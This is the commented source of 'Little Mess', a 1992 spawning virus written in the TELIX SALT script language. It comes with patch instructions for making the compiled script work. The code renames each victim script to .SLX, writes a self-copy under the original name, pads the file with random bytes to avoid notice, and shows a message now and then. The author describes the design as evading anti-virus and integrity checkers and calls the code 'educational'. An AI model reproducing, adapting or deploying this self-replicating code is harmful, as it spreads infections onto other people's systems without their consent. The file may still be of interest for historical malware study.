// Little Mess spawning virus source (c) 92 Crom-Cruach/Trident // Source in SALT // // The compiled script needs some little changes: // *First, both 1234h's in the SLC must be replaced by (FileLen-011h) // *the 1st 11h bytes of the script must be copied over the 'REPLACE ME!'; // *Both 1D 06 00's sequences MUST be replaced by 1D 02 00... // This is of course only educational, and even if it wasn't, it still wouldn't // spread due to the script exchange rate. // // Bad minds, however, might think it's fun having their local network-sysop // screaming about his system being infected while all anti-viral/integrity // programs miss it (or, him being dissed for saying he's got a // script-virus)... Of course, those people are wrong and/or sick. // Symptoms - 1 out of 8 times it displays a message for 1 sec after // script execution if all scripts infected. // Greetz - NuKE / Phalcon/SKISM / YAM & All other practicing researchers... // Technical info --- // // First, the uninfected file is renamed to *.SLX. // Then, the SLC file is created and the copy of the header is written to it. // After that, the whole virus is written as a string to the file (SALT-string // identification code is 19h; offsets in SLC are calculated relative to the // end of the header (= on +0Ch) - The 06 -> 02 patch changes the offset of the // buffer to write from Title (+6) to [EndHeader+1] (+2)... The 1234-patch is // needed to fill in the size of that string). After that, some random bytes // are written to make the files less suspicious (the amount must be even; at // least, CS (the TELIX script compiler) never creates files with odd lengths) // I wanted to mark the SLX files as hidden; but in SALT you can only -read- // the attribute of a file. Solution could be to write a little routine in ASM // to a temporary file & to RUN that file; I decided not to, because the flash // from the shell-to-dos is much more obvious than some 'SLX'-files. // A system can be infected by starting this script from Telix. It will // infect one script at a time. int EndHeader = 0x123419; // Needed for code-copy str Title[40] = "[Little Mess (c) 92 Crom-Cruach/Trident]"; str Org_Ext[4] = ".SLX"; str Path[64],Trash[64]; str Buf[12] = ""; // No script to start after 'mother'. str Spawned_On[12]; // Header str Header[17]="REPLACE ME!"; // must be replaced by header (debug) int Handle; main() { Spawned_On = Buf; path = _script_dir; strcat(path,"*.SLC"); // Search script (not 8 chars-FName!) FNext: if (not FileFind(path,0,Buf)) // File found? { EndHeader=0; } // No more; mark 'all infected' else { path = ""; // Prepare for find-next trash = _script_dir; strcat(trash,Buf); // Trash = path+filename+ext FNStrip(Trash,7,Buf); // Buf = filename only strcat(Buf,Org_Ext); // Give new extension if (frename(Trash,Buf) != 0) goto FNext; // File not renamed (already spawned) Handle = FOpen(Trash,"w"); // Make new file, same name If (Handle == 0) // Error opening; restore orig. fname { Path = _script_dir; strcat(path,Buf); // path = path+new_fname frename(Path,Trash); // rename-back goto Quit_Infect; } FWrite(Header,17,Handle); // Write header FWrite(Title,0x1234,Handle); // Title REPLACED by (ofs EndH.+1) FWrite(Title,(CurTime()&254),Handle); // Make size random (must be even) FClose(Handle); } Quit_Infect: call(Spawned_On); // Start orig. script if ((EndHeader==0) and // If all infected ((CurTime()&7)==7)) // Show message 1 out of 8 times Status_Wind("Legalize Marijuana! - ÂÚ³äïÂ",10); }